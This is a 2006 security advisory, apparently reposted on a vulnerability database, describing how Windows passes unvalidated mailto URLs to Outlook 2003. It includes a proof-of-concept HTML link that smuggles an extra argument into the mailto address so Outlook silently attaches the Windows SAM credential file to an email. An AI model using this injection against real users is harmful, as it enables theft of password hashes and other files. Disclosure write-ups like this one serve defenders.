Multiple browsers Windows mailto protocol Office 2003 file attachment exploit

2006.04.27
Risk: Low
Local: No
Remote: Yes
CWE: CWE-Other


CVSS Base Score: 5/10
Impact Subscore: 2.9/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: None
Availability impact: None

** Inge Henriksen Security Advisory http://ingehenriksen.blogspot.com/ ** Advisory Name: Multiple browsers Windows mailto protocol Office 2003 file attachment exploit Release Date: Not released Tested and Confirmed Vulerable: Micrsoft Outlook 2003 SP 1 Microsoft Internet Explorer 6 SP2 Mozilla Firefox 1.06 Avant Browser 10.1 Build 17 Severity: Low Type: Stealing files From where: Remote Discovered by: Inge Henriksen (inge.henriksen (at) booleansoft (dot) com [email concealed]) http://ingehenriksen.blogspot.com/ Vendor Status: Not notified Overview: Application protocols handling in Microsoft Windows is badly designed, i.e. when someone types mailto:someone (at) somewhere (dot) com [email concealed] into a browser the protocol is first looked up under HKEY_CLASSES_ROOT%protocol%shellopencommand, if it is a protocol that is allowed under the current user context then the value is simply replaced by the contents in the address bar at %1. In our example "C:PROGRA~1MICROS~3OFFICE11OUTLOOK.EXE" -c IPM.Note /m "%1" would become "C:PROGRA~1MICROS~3OFFICE11OUTLOOK.EXE" -c IPM.Note /m "mailto:someone (at) somewhere (dot) com [email concealed]" There is absolutely no input validation in all the browsers I have tested, i.e. there are exploits availible by entering more data into the address bar than was intended. Proof-of Concept: The mailto application protocol can be axploited by entering <email>""<filepath>, this will cause OUTLOOK.EXE to attach the file <filepath> to the email without asking for permission, thus opening up for sensitive files to be stolen when a user sends an email it is fair to believe that many people would not notice the attached file before sending the email. To attach the SAM file to a email a html file could contain this: <a href='mailto:someone (at) somewhere (dot) com [email concealed]""..........windowsREPAIRSAM'>C lick here to email me</a> The command being run would now be: "C:PROGRA~1MICROS~3OFFICE11OUTLOOK.EXE" -c IPM.Note /m "mailto:someone (at) somewhere (dot) com [email concealed]""..........windowsREPAIRSAM" , thus attaching the SAM file.


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021, cxsecurity.com

 

Back to Top